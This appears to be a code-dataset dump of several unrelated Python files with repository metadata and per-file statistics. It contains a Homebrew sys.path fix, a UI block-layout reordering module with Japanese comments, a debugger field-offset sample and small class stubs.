await message.channel.send(embed=help_content) | 59.824561 | 153 | 0.630792 | 900 | 6,820 | 4.691111 | 0.094444 | 0.120085 | 0.13856 | 0.053055 | 0.920417 | 0.898626 | 0.883468 | 0.870677 | 0.870677 | 0.867598 | 0 | 0.03875 | 0.197801 | 6,820 | 114 | 154 | 59.824561 | 0.727107 | 0 | 0 | 0.776786 | 0 | 0 | 0.027728 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.017857 | 0 | 0.035714 | 0.026786 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
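The four reaction branches in `decoder`/`encoder` map onto stdlib `base64` round trips. A minimal sketch of just the codec layer the handlers call (the project-specific `binary` module used by branch 4️⃣ is omitted here):

```python
import base64

# (encode, decode) pairs for the three base64-family schemes used above.
CODECS = {
    "base64": (base64.standard_b64encode, base64.standard_b64decode),
    "base32": (base64.b32encode, base64.b32decode),
    "base16": (base64.b16encode, base64.b16decode),
}

def encode(scheme: str, text: str) -> str:
    enc, _ = CODECS[scheme]
    return enc(text.encode("ascii")).decode("ascii")

def decode(scheme: str, text: str) -> str:
    _, dec = CODECS[scheme]
    return dec(text.encode("ascii")).decode("ascii")
```

As in the handlers above, any non-ASCII input or malformed padding raises, which is why every branch wraps the call in `try`/`except` and falls back to the localized error string.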
ac612cbaeb47dc0fac701f74a47883595d4f8058 | 900 | py | Python | fix_brew_python.py | mpeyrotc/govector | 5429d538d0bcee4d95d9069dd397b3b5b35b504c | [
"MIT"
] | null | null | null | fix_brew_python.py | mpeyrotc/govector | 5429d538d0bcee4d95d9069dd397b3b5b35b504c | [
"MIT"
] | null | null | null | fix_brew_python.py | mpeyrotc/govector | 5429d538d0bcee4d95d9069dd397b3b5b35b504c | [
"MIT"
] | null | null | null | import sys
# Drop Homebrew (Cellar) entries so the Apple system Python paths take precedence
sys.path = [p for p in sys.path if 'Cellar' not in p]
new_path = ['/System/Library/Frameworks/Python.framework/Versions/2.7/lib/python27.zip',
'/System/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7',
'/System/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/plat-darwin',
'/System/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/plat-mac',
'/System/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/plat-mac/lib-scriptpackages',
'/System/Library/Frameworks/Python.framework/Versions/2.7/Extras/lib/python',
'/System/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/lib-tk',
'/System/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/lib-old',
'/System/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/lib-dynload']
for p in new_path:
if p not in sys.path:
sys.path.append(p)
| 52.941176 | 101 | 0.772222 | 145 | 900 | 4.77931 | 0.213793 | 0.063492 | 0.298701 | 0.376623 | 0.777778 | 0.777778 | 0.777778 | 0.777778 | 0.708514 | 0.634921 | 0 | 0.039953 | 0.054444 | 900 | 16 | 102 | 56.25 | 0.774383 | 0 | 0 | 0 | 0 | 0.642857 | 0.798889 | 0.792222 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.071429 | 0 | 0.071429 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
ac764f1095a945abbf0f2a30fc09e4d92a7f669f | 27,768 | py | Python | element_layout.py | DiNOV-Tokyo/uied-d | c15d7e003dda13c24cfd0c17b4efb058dcc3b292 | [
"Apache-2.0"
] | null | null | null | element_layout.py | DiNOV-Tokyo/uied-d | c15d7e003dda13c24cfd0c17b4efb058dcc3b292 | [
"Apache-2.0"
] | null | null | null | element_layout.py | DiNOV-Tokyo/uied-d | c15d7e003dda13c24cfd0c17b4efb058dcc3b292 | [
"Apache-2.0"
] | null | null | null | import json
import element_reorder as er
# Represent the arrangement of UI blocks as a list.
# Block numbers are the list elements; the nesting of the list maps directly onto div/col structure.
# [[1,2],[3,4]],[5,6]
# 1 and 2 (likewise 3 and 4) share a column; [1,2], [3,4] and [5,6] share a div.
#with open(filename_element_json, mode='wt', encoding='utf-8') as fe:
# fe.writelines(element_list)
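As the comment above describes, a layout is an arbitrarily nested list of block numbers. A small helper (a sketch, not part of this module) that flattens such a layout back into its block numbers:

```python
def flatten_layout(layout):
    """Yield block numbers from a nested row/column layout list
    in left-to-right order, e.g. [[1, 2], [3, 4], [5, 6]] -> 1..6."""
    for item in layout:
        if isinstance(item, list):
            yield from flatten_layout(item)
        else:
            yield item
```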
def layout_arrange(element_list):
block_layout = []
first_element_flg = True
for element in element_list:
next_loop_flg = False
element_json = json.loads(element)
cnt = len(block_layout)
print("========================================================================================")
print("block = " + str(element_json["block_num"]) + " Scan START : cnt = " + str(cnt))
# First, add the very first element to the list.
if first_element_flg:
block_layout.append(element_json["block_num"])
first_element_flg = False
else:
# cnt = len(block_layout)
idx = element_json["block_num"]
cnt_tmp = 0
not_in_list_flg = False
not_in_same_row_flg = True
in_same_row_flg = False
for block_num0 in block_layout:
print(block_num0)
block_num0_idx = block_layout.index(block_num0)
# Within the same row, find which column this block belongs to
if isinstance(block_num0, list):
cnt_tmp1 = 0
cnt1 = er.list_count(block_num0)
print("Show block")
print(block_num0)
print(type(block_num0))
# Does the list contain a nested list? If so, descend one level and work there
if er.isNextList(block_num0):
# counter for the nested list
in_cnt = 0
for block_num1 in block_num0:
print(block_num0)
if isinstance(block_num1, list):
print("Deepest-LIST SCAN START")
block_list_send = block_num1
block_num1_idx = block_num0.index(block_num1)
block_list_return, in_same_row_flg, in_same_col_flg = er.deep_list_reorder(idx, block_list_send, element_list)
cnt_tmp1 = cnt_tmp1 + 1
cnt_tmp = cnt_tmp + 1
in_cnt = in_cnt + 1
if in_same_row_flg:
not_in_same_row_flg = False
if block_list_send == block_list_return:
if idx not in block_list_send:
not_in_list_flg = True
else:
not_in_list_flg = False
print("PASS")
pass
else:
next_loop_flg = True
block_num0.remove(block_num1)
block_num0.insert(block_num1_idx, block_list_return)
print(block_layout)
break
print("Deepest-LIST SCAN END")
# 同じrowでリストの最後につける
if not_in_list_flg and cnt_tmp1 == cnt1 and in_same_col_flg:
#cnt_tmp = cnt_tmp + 1
next_loop_flg = True
block_num0.append(idx)
break
else:
print("NOT Deepest-LIST SCAN START")
block_list_send = block_num0
block_list_return, in_same_row_flg, in_same_col_flg = er.list_reorder(idx, block_list_send, element_list)
print("block_list_return : " + str(idx) + " in_same_row_flg :" + str(in_same_row_flg) + " in_same_col_flg : " + str(in_same_col_flg))
cnt_tmp = cnt_tmp + 1
if in_same_row_flg:
not_in_same_row_flg = False
block_layout.remove(block_num0)
block_layout.insert(block_num0_idx, block_list_return)
print("HHHHHHHHH")
print(block_layout)
if block_list_send == block_list_return:
if idx not in block_list_send:
not_in_list_flg = True
else:
not_in_list_flg = False
pass
else:
next_loop_flg = True
not_in_list_flg = False
break
print("block_layout")
if next_loop_flg:
# next_loop_flg = False
break
else:
block_list_send = [block_num0]
block_list_return, in_same_row_flg, in_same_col_flg = er.list_reorder(idx, block_list_send, element_list)
cnt_tmp = cnt_tmp + 1
if in_same_row_flg:
not_in_same_row_flg = False
block_layout.remove(block_num0)
block_layout.insert(block_num0_idx, block_list_return)
if block_list_send == block_list_return:
if idx not in block_list_send:
not_in_list_flg = True
else:
not_in_list_flg = False
pass
else:
not_in_list_flg = False
break
# if next_loop_flg:
#3 next_loop_flg = False
# break
# print("block_layout")
# if next_loop_flg:
# next_loop_flg = False
# break
print("idx = " + str(idx) + " not_in_list_flg = " + str(not_in_list_flg) + " cnt_tmp = " + str(cnt_tmp) + " cnt = " + str(cnt))
# 同じrowでリストの最後につける
if not_in_list_flg and cnt_tmp >= cnt and not er.isInList(block_layout, idx):
# if not_in_list_flg and cnt_tmp == cnt:
print(block_layout)
# 同じrowにあるとき
if not not_in_same_row_flg:
print("[end] Same row")
#cnt_tmp = cnt_tmp + 1
#block_layout.append([idx])
if len(block_layout) == 1:
block_layout.append([idx])
else:
# block_layoutの形で次のレイアウトがきまる。
# [[*], [*]],[*] の時、[[*], [*]],[[*],[*]] にしたい。
# [*], [*], [*] の時、[*], [*], [*], [*] にしたい。
least_2_block = str(block_layout[len(block_layout)-2])
print(least_2_block)
if ']]' in least_2_block:
print("LEAST 2 Block")
least_block = block_layout[len(block_layout)-1]
print(least_block)
block_layout.remove(least_block)
print(block_layout)
block_layout.append([least_block, [idx]])
else:
print("Simple append")
block_layout.append([idx])
else:
# 次のrowに行くとき
print("[end] Different row")
block_layout = [block_layout, [idx]]
print("idx = " + str(element_json["block_num"]))
print(block_layout)
if "[[[" in str(block_layout):
pass
else:
block_layout = [block_layout]
return block_layout

def layout_arrange2(element_list):
    block_layout = []
    first_element_flg = True
    for element in element_list:
        next_loop_flg = False
        element_json = json.loads(element)
        cnt = len(block_layout)
        print("========================================================================================")
        print("block = " + str(element_json["block_num"]) + " Scan START : cnt = " + str(cnt))
        # Add the very first element to the layout list.
        if first_element_flg:
            block_layout.append([element_json["block_num"]])
            print(block_layout)
            n = input()  # debug pause: wait for Enter before continuing
            first_element_flg = False
        else:
            idx = element_json["block_num"]
            cnt_tmp = 0
            not_in_list_flg = False
            not_in_same_row_flg = True
            in_same_row_flg = False
            for block_num0 in block_layout:
                print(block_num0)
                block_num0_idx = block_layout.index(block_num0)
                # Work out which col within the same row the element belongs to.
                if isinstance(block_num0, list):
                    cnt_tmp1 = 0
                    cnt1 = er.list_count(block_num0)
                    print("Show block")
                    print(block_num0)
                    print(type(block_num0))
                    # Is there a list inside this list? If so, descend one level and work there.
                    if er.isNextList(block_num0):
                        # counter for the nested list
                        in_cnt = 0
                        for block_num1 in block_num0:
                            print(block_num0)
                            if isinstance(block_num1, list):
                                print("Deepest-LIST SCAN START")
                                block_list_send = block_num1
                                block_num1_idx = block_num0.index(block_num1)
                                block_list_return, in_same_row_flg, in_same_col_flg = er.deep_list_reorder(idx, block_list_send, element_list)
                                cnt_tmp1 = cnt_tmp1 + 1
                                cnt_tmp = cnt_tmp + 1
                                in_cnt = in_cnt + 1
                                if in_same_row_flg:
                                    not_in_same_row_flg = False
                                if block_list_send == block_list_return:
                                    if idx not in block_list_send:
                                        not_in_list_flg = True
                                    else:
                                        not_in_list_flg = False
                                    print("PASS")
                                else:
                                    next_loop_flg = True
                                    block_num0.remove(block_num1)
                                    block_num0.insert(block_num1_idx, block_list_return)
                                    print(block_layout)
                                    break
                        print("Deepest-LIST SCAN END")
                        # Append at the end of the list within the same row.
                        if not_in_list_flg and cnt_tmp1 == cnt1 and in_same_col_flg:
                            next_loop_flg = True
                            block_num0.append(idx)
                            break
                    else:
                        print("NOT Deepest-LIST SCAN START")
                        block_list_send = block_num0
                        block_list_return, in_same_row_flg, in_same_col_flg = er.list_reorder(idx, block_list_send, element_list)
                        print("block_list_return : " + str(idx) + " in_same_row_flg :" + str(in_same_row_flg) + " in_same_col_flg : " + str(in_same_col_flg))
                        cnt_tmp = cnt_tmp + 1
                        if in_same_row_flg:
                            not_in_same_row_flg = False
                        block_layout.remove(block_num0)
                        block_layout.insert(block_num0_idx, block_list_return)
                        print(block_layout)
                        if block_list_send == block_list_return:
                            if idx not in block_list_send:
                                not_in_list_flg = True
                            else:
                                not_in_list_flg = False
                        else:
                            next_loop_flg = True
                            not_in_list_flg = False
                            break
                    print("block_layout")
                    if next_loop_flg:
                        break
                else:
                    block_list_send = [block_num0]
                    block_list_return, in_same_row_flg, in_same_col_flg = er.list_reorder(idx, block_list_send, element_list)
                    cnt_tmp = cnt_tmp + 1
                    if in_same_row_flg:
                        not_in_same_row_flg = False
                    block_layout.remove(block_num0)
                    block_layout.insert(block_num0_idx, block_list_return)
                    if block_list_send == block_list_return:
                        if idx not in block_list_send:
                            not_in_list_flg = True
                        else:
                            not_in_list_flg = False
                    else:
                        not_in_list_flg = False
                        break
            print("idx = " + str(idx) + " not_in_list_flg = " + str(not_in_list_flg) + " cnt_tmp = " + str(cnt_tmp) + " cnt = " + str(cnt))
            # Append at the end of the list within the same row.
            if not_in_list_flg and cnt_tmp >= cnt and not er.isInList(block_layout, idx):
                print(block_layout)
                # When the element is in the same row
                if not not_in_same_row_flg:
                    print("[end] Same row")
                    if len(block_layout) == 1:
                        block_layout.append([idx])
                    else:
                        # The current shape of block_layout decides the next layout:
                        # [[*], [*]],[*] should become [[*], [*]],[[*],[*]];
                        # [*], [*], [*] should become [*], [*], [*], [*].
                        least_2_block = str(block_layout[len(block_layout) - 2])
                        print(least_2_block)
                        if ']]' in least_2_block:
                            print("LEAST 2 Block")
                            least_block = block_layout[len(block_layout) - 1]
                            print(least_block)
                            block_layout.remove(least_block)
                            print(block_layout)
                            block_layout.append([least_block, [idx]])
                        else:
                            print("Simple append")
                            block_layout.append([idx])
                else:
                    # Moving on to the next row
                    print("[end] Different row")
                    block_layout = [block_layout, [idx]]
        print("idx = " + str(element_json["block_num"]))
        print(block_layout)
    if "[[[" not in str(block_layout):
        block_layout = [block_layout]
    return block_layout

def layout_number(element_list, block_layout):
    div_num = 0
    col_num = 0
    element_result = []
    cnt = 0
    for k in block_layout:
        if isinstance(k, list):
            for m in k:
                if isinstance(m, list):
                    for n in m:
                        element_json = json.loads(element_list[n])
                        element_json["block_num"] = cnt
                        element_json["div_num"] = div_num
                        element_json["col_num"] = col_num
                        element_result.append(element_json)
                        cnt = cnt + 1
                else:
                    element_json = json.loads(element_list[m])
                    element_json["block_num"] = cnt
                    element_json["div_num"] = div_num
                    element_json["col_num"] = col_num
                    element_result.append(element_json)
                    cnt = cnt + 1
                col_num = col_num + 1
        else:
            element_json = json.loads(element_list[k])
            element_json["block_num"] = cnt
            element_json["div_num"] = div_num
            element_json["col_num"] = col_num
            element_result.append(element_json)
            cnt = cnt + 1
        div_num = div_num + 1
        col_num = 0
    return element_result
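The renumbering above can be sketched with a simplified stand-in (the helper name, the `name` field, and the toy layout are assumptions for illustration, not part of this module): each top-level entry becomes a div, each entry inside it a col, and elements are renumbered in traversal order.

```python
import json

# Simplified sketch of layout_number-style renumbering: element_list is
# indexed by the original block number; the nested layout drives the new
# block_num / div_num / col_num assignments.
def number_layout(element_list, block_layout):
    div_num, cnt, result = 0, 0, []
    for row in block_layout:
        col_num = 0
        for col in (row if isinstance(row, list) else [row]):
            for n in (col if isinstance(col, list) else [col]):
                e = json.loads(element_list[n])
                e.update(block_num=cnt, div_num=div_num, col_num=col_num)
                result.append(e)
                cnt += 1
            col_num += 1
        div_num += 1
    return result

elements = [json.dumps({"name": "b%d" % i}) for i in range(4)]
ordered = number_layout(elements, [[[2, 0]], [[1], [3]]])
print([(e["name"], e["div_num"], e["col_num"]) for e in ordered])
# [('b2', 0, 0), ('b0', 0, 0), ('b1', 1, 0), ('b3', 1, 1)]
```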

def all_layout_reorder(element_list):
    block_layout = []
    first_element_flg = True
    for element in element_list:
        element_json = json.loads(element)
        # Add the very first element to the layout list.
        if first_element_flg:
            block_layout.append([[element_json["block_num"]]])
            first_element_flg = False
            print(block_layout)
        else:
            idx = element_json["block_num"]
            # Is the element already inside a previously built block?
            is_in_block_flg = False
            cnt_row = 0
            no_row = len(block_layout)
            # Examine each row of block_layout.
            for block_rows in block_layout:
                print("\n\n==========================================")
                print("Now examining ============")
                print(block_rows)
                print("with respect to ==========")
                print("\t block_row idx= " + str(idx))
                print("Checking now. ============\n")
                cnt_row = cnt_row + 1
                is_in_block_flg, block_layout_return, in_same_row_flg, in_same_col_flg, is_forehead_flg = row_layout_reorder(idx, block_rows, element_list, is_in_block_flg)
                print("diff _ all")
                print("[cnt_row / no_row] ; is_in_block_flg, in_same_row_flg, in_same_col_flg, is_forehead_flg : [" + str(cnt_row) + " / " + str(no_row) + "] ; " + str(is_in_block_flg) + " : " + str(in_same_row_flg) + " : " + str(in_same_col_flg) + " : " + str(is_forehead_flg))
                print(block_layout_return)
                print(block_rows)
                print(block_layout_return != block_rows)
                if block_layout_return != block_rows:
                    index0 = block_layout.index(block_rows)
                    block_layout.remove(block_rows)
                    block_layout.insert(index0, block_layout_return)
                else:
                    if not in_same_row_flg and is_forehead_flg:
                        print("[cnt_row / no_row] ; is_in_block_flg, in_same_row_flg, in_same_col_flg, is_forehead_flg : [" + str(cnt_row) + " / " + str(no_row) + "] ; " + str(is_in_block_flg) + " : " + str(in_same_row_flg) + " : " + str(in_same_col_flg) + " : " + str(is_forehead_flg))
                        print("Did we land here?")
                        if cnt_row != no_row:
                            if not is_in_block_flg:
                                index0 = block_layout.index(block_rows)
                                block_layout.remove(block_rows)
                                block_layout.insert(index0, [[idx]])
                                is_in_block_flg = True
                                block_layout.insert(index0 + 1, block_rows)
                        else:
                            block_layout.remove(block_rows)
                            if not is_in_block_flg:
                                block_layout.append([[idx]])
                                is_in_block_flg = True
                            block_layout.append(block_rows)
                    elif not in_same_row_flg and cnt_row == no_row:
                        if not is_in_block_flg:
                            block_layout.append([[idx]])
                            is_in_block_flg = True
            print("Final block, intermediate state; block_row_layout end " + str(idx))
            print(block_layout)
    return block_layout

def row_layout_reorder(idx, block_rows, element_list, is_in_block_flg):
    block_layout_row = []
    cnt_col = 0
    no_col = len(block_rows)
    print(block_rows)
    # Examine each col of block_layout.
    for block_col in block_rows:
        cnt_col = cnt_col + 1
        print("Col under consideration ---------------")
        print(block_col)
        print("\t idx is " + str(idx) + "-----------")
        is_in_block_flg, block_layout_return, in_same_row_flg, in_same_col_flg, is_forehead_flg = col_layout_reorder(idx, block_col, element_list, is_in_block_flg)
        print("diff _ row")
        print("[cnt_col / no_col] ; is_in_block_flg, in_same_row_flg, in_same_col_flg, is_forehead_flg : [" + str(cnt_col) + " / " + str(no_col) + "] ; " + str(is_in_block_flg) + " : " + str(in_same_row_flg) + " : " + str(in_same_col_flg) + " : " + str(is_forehead_flg))
        print(block_layout_return)
        print(block_col)
        print(block_layout_return == block_col)
        if block_layout_return != block_col and not is_forehead_flg:
            block_layout_row.append(block_layout_return)
            print("Row block: branch 1")
        elif block_layout_return != block_col and is_forehead_flg:
            if block_col in block_layout_row:
                block_layout_row.remove(block_col)
            block_layout_row.append(block_layout_return)
            block_layout_row.append(block_col)
            print("Row block: branch 2")
        else:
            if in_same_row_flg and cnt_col == no_col and not is_forehead_flg:
                block_layout_row.append(block_layout_return)
                if not is_in_block_flg:
                    block_layout_row.append([idx])
                    is_in_block_flg = True
                print("Row block: branch 3")
            elif in_same_row_flg and cnt_col == no_col and is_forehead_flg:
                if not is_in_block_flg:
                    block_layout_row.append([idx])
                    is_in_block_flg = True
                block_layout_row.append(block_layout_return)
                print("Row block: branch 4")
            elif in_same_row_flg and is_forehead_flg:
                if not is_in_block_flg:
                    block_layout_row.append([idx])
                    is_in_block_flg = True
                block_layout_row.append(block_layout_return)
                print("Row block: branch 5")
            elif not in_same_row_flg and is_forehead_flg:
                print("[cnt_col / no_col] ; is_in_block_flg, in_same_row_flg, in_same_col_flg, is_forehead_flg : [" + str(cnt_col) + " / " + str(no_col) + "] ; " + str(is_in_block_flg) + " : " + str(in_same_row_flg) + " : " + str(in_same_col_flg) + " : " + str(is_forehead_flg))
                print("Row block: branch 6")
                block_layout_row.append(block_col)
            else:
                block_layout_row.append(block_col)
                print("Row block: branch 7")
        print("Row block intermediate state = ")
        print(block_layout_row)
    print("return block_layout row = ")
    print(block_layout_row)
    return is_in_block_flg, block_layout_row, in_same_row_flg, in_same_col_flg, is_forehead_flg

# idx : block number under consideration
# block_col : list of blocks to examine
# element_list : full list of blocks
# return : list with the idx block inserted
# Builds the col list.
def col_layout_reorder(idx, block_col, element_list, is_in_block_flg):
    block_layout_col = []
    # Load the element under consideration.
    block_idx_json = json.loads(element_list[idx])
    # Flag: is the element in the same row?
    in_same_row_flg = False
    # Flag: is the element in the same column?
    in_same_col_flg = False
    # Flag: does the element come before the one being examined?
    is_forehead_flg = False
    # Flag: result of the previous before/after check.
    pre_is_forehead_flg = False
    # Number of elements examined so far.
    no_cnt = 0
    # Total number of elements in the col list being examined.
    print(block_col)
    no_elemt = len(block_col)
    for i in block_col:
        block_comp_json = json.loads(element_list[i])
        no_cnt = no_cnt + 1
        # NOTE: the checks and thresholds below need review!
        # Is the element in the same row? This is a hard call...
        if (abs(block_comp_json["block_height_center"] - block_idx_json["block_height_center"]) < 200) or (abs(block_comp_json["block_top"] - block_idx_json["block_top"]) < 30) or (abs(block_comp_json["block_bottom"] - block_idx_json["block_bottom"]) < 30):
            in_same_row_flg = True
            diff_val = 80
            if (block_comp_json["block_top"] - block_idx_json["block_bottom"]) > diff_val or (block_idx_json["block_top"] - block_comp_json["block_bottom"]) > diff_val:
                in_same_row_flg = False
        else:
            in_same_row_flg = False
        # Is the element in the same column?
        if (abs(block_comp_json["block_left"] - block_idx_json["block_left"]) < 40) or (abs(block_comp_json["block_width_center"] - block_idx_json["block_width_center"]) < 120):
            in_same_col_flg = True
        # Detect the before/after relationship.
        if block_comp_json["block_top"] > block_idx_json["block_bottom"] and abs(block_comp_json["block_top"] - block_idx_json["block_bottom"]) < 300:
            # The block being examined comes before the block scanned in this loop.
            is_forehead_flg = True
            print("Here? 1")
        elif block_comp_json["block_bottom"] < block_idx_json["block_top"] and abs(block_comp_json["block_bottom"] - block_idx_json["block_top"]) < 300:
            # The block being examined comes after the block scanned in this loop.
            is_forehead_flg = False
        # Not in the same column, and comes before.
        elif (block_comp_json["block_top"] > block_idx_json["block_bottom"]) and (block_comp_json["block_right"] > block_idx_json["block_left"]):
            is_forehead_flg = True
            print("Here? 2")
            print("comp = " + str(block_comp_json["block_num"]) + " idx = " + str(block_idx_json["block_num"]))
            print("top = " + str(block_comp_json["block_top"]) + " Bottom = " + str(block_idx_json["block_bottom"]))
        # Not in the same column, and comes before.
        elif (block_comp_json["block_left"] > block_idx_json["block_right"]) and (block_comp_json["block_bottom"] > block_idx_json["block_bottom"]):
            is_forehead_flg = True
            print("Here? 3")
        # Not in the same column, and comes after.
        else:
            is_forehead_flg = False
            in_same_col_flg = False
        # Insert the element into block_layout.
        # Handles the case where the ordering is already settled before all col
        # elements have been examined: same row, same col, and the before/after
        # relationship just flipped.
        if in_same_row_flg and in_same_col_flg and not pre_is_forehead_flg and is_forehead_flg:
            block_layout_col.append(idx)
            block_layout_col.append(i)
            is_in_block_flg = True
            break
        block_layout_col.append(i)
        pre_is_forehead_flg = is_forehead_flg
        # Insert the element into block_layout.
        # Handles the case where all col elements have been examined and the
        # element is in the same row and same col.
        if in_same_row_flg and in_same_col_flg and no_cnt == no_elemt and not is_in_block_flg:
            # Everything in block_layout has been examined.
            if not is_forehead_flg:
                # The element comes after...
                block_layout_col.append(idx)
                is_in_block_flg = True
            else:
                # The element comes before...
                block_layout_col.remove(i)
                block_layout_col.append(idx)
                block_layout_col.append(i)
                is_in_block_flg = True
    print("return block_layout col = ")
    print(block_layout_col)
    print("==========================")
    return is_in_block_flg, block_layout_col, in_same_row_flg, in_same_col_flg, is_forehead_flg
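The geometric "same row" test above can be sketched in isolation. This is a simplified stand-in, not the module's function; the default thresholds mirror the hard-coded 200/30/80 values and are tuning knobs, and the toy block dictionaries are assumptions for illustration:

```python
# Simplified sketch of the same-row heuristic used in col_layout_reorder:
# blocks are "close" if their vertical centers or edges nearly align, unless
# a large vertical gap separates them.
def in_same_row(a, b, center_tol=200, edge_tol=30, gap_tol=80):
    close = (abs(a["block_height_center"] - b["block_height_center"]) < center_tol
             or abs(a["block_top"] - b["block_top"]) < edge_tol
             or abs(a["block_bottom"] - b["block_bottom"]) < edge_tol)
    # A large vertical gap overrides the closeness test.
    gap = (a["block_top"] - b["block_bottom"] > gap_tol
           or b["block_top"] - a["block_bottom"] > gap_tol)
    return close and not gap

left = {"block_top": 10, "block_bottom": 50, "block_height_center": 30}
right = {"block_top": 15, "block_bottom": 55, "block_height_center": 35}
below = {"block_top": 300, "block_bottom": 340, "block_height_center": 320}
print(in_same_row(left, right), in_same_row(left, below))  # True False
```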
| 39.220339 | 292 | 0.492113 | 2,997 | 27,768 | 4.14648 | 0.06373 | 0.120383 | 0.03766 | 0.050213 | 0.838658 | 0.783777 | 0.758751 | 0.738795 | 0.725678 | 0.716424 | 0 | 0.010617 | 0.41998 | 27,768 | 707 | 293 | 39.275813 | 0.760338 | 0.069829 | 0 | 0.768085 | 0 | 0 | 0.089052 | 0.009631 | 0 | 0 | 0 | 0 | 0 | 1 | 0.012766 | false | 0.021277 | 0.004255 | 0 | 0.029787 | 0.214894 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
cbf2fe0c8974e25aab48b065f745e473fbf7dbc6 | 230 | py | Python | samples/py/fieldOffset.py | alexbudmsft/dbgscript | 76dc77109bbeb8f09a893e9dd56012ff8a4b601f | [
"PSF-2.0"
] | 27 | 2015-11-05T22:19:34.000Z | 2021-08-21T02:03:52.000Z | samples/py/fieldOffset.py | alexbudmsft/dbgscript | 76dc77109bbeb8f09a893e9dd56012ff8a4b601f | [
"PSF-2.0"
] | null | null | null | samples/py/fieldOffset.py | alexbudmsft/dbgscript | 76dc77109bbeb8f09a893e9dd56012ff8a4b601f | [
"PSF-2.0"
] | 2 | 2015-11-06T04:32:31.000Z | 2016-08-22T18:24:20.000Z | print(dbgscript.field_offset('nt!GUID', 'Data1')) # -> 0
print(dbgscript.field_offset('nt!GUID', 'Data2')) # -> 4
print(dbgscript.field_offset('nt!GUID', 'Data3')) # -> 6
print(dbgscript.field_offset('nt!GUID', 'Data4')) # -> 8 | 57.5 | 57 | 0.66087 | 32 | 230 | 4.625 | 0.4375 | 0.378378 | 0.513514 | 0.675676 | 0.837838 | 0.837838 | 0 | 0 | 0 | 0 | 0 | 0.038462 | 0.095652 | 230 | 4 | 58 | 57.5 | 0.673077 | 0.082609 | 0 | 0 | 0 | 0 | 0.235294 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 8 |
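The same field-offset idea can be reproduced for plain C structs with the standard `ctypes` module; the struct below uses the standard Windows GUID layout, which matches the offsets (0, 4, 6, 8) shown in the debugger sample:

```python
import ctypes

# GUID laid out as in the Windows definition.
class GUID(ctypes.Structure):
    _fields_ = [
        ("Data1", ctypes.c_uint32),
        ("Data2", ctypes.c_uint16),
        ("Data3", ctypes.c_uint16),
        ("Data4", ctypes.c_uint8 * 8),
    ]

# Each field descriptor exposes its byte offset within the struct.
for name in ("Data1", "Data2", "Data3", "Data4"):
    print(name, getattr(GUID, name).offset)  # -> 0, 4, 6, 8
```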
021a8e3c760b276e4305d7e5836142f11f0e465d | 98 | py | Python | inheritance/zoo/project/bear.py | lowrybg/PythonOOP | 1ef5023ca76645d5d96b8c4fb9a54d0f431a1947 | [
"MIT"
] | null | null | null | inheritance/zoo/project/bear.py | lowrybg/PythonOOP | 1ef5023ca76645d5d96b8c4fb9a54d0f431a1947 | [
"MIT"
] | null | null | null | inheritance/zoo/project/bear.py | lowrybg/PythonOOP | 1ef5023ca76645d5d96b8c4fb9a54d0f431a1947 | [
"MIT"
] | null | null | null | from project.animal import Animal
from project.mammal import Mammal
class Bear(Mammal):
    pass
0222cbaa0838daed453e8dc40151327213f8eaf1 | 122 | py | Python | src/open_large/helper/__init__.py | schmelczer/open-s3 | afa000f371403a1162897647123d8fadcdb4db9a | [
"MIT"
] | 2 | 2022-01-27T15:43:43.000Z | 2022-01-30T21:42:49.000Z | src/open_large/helper/__init__.py | schmelczer/open-s3 | afa000f371403a1162897647123d8fadcdb4db9a | [
"MIT"
] | null | null | null | src/open_large/helper/__init__.py | schmelczer/open-s3 | afa000f371403a1162897647123d8fadcdb4db9a | [
"MIT"
] | null | null | null | from .create_file_progress_bar import create_file_progress_bar
from .human_readable_to_byte import human_readable_to_byte
| 40.666667 | 62 | 0.918033 | 20 | 122 | 5 | 0.5 | 0.2 | 0.36 | 0.42 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.065574 | 122 | 2 | 63 | 61 | 0.877193 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
023a4f15eab9668867610aad47e99cd4bb778e72 | 805 | py | Python | Machine learning/Reinforcement Learning/sueca-master/python/nn/nn_main.py | vascobailao/Python | 37473ab5c9629b77f0b618737473276716df4e4f | [
"MIT"
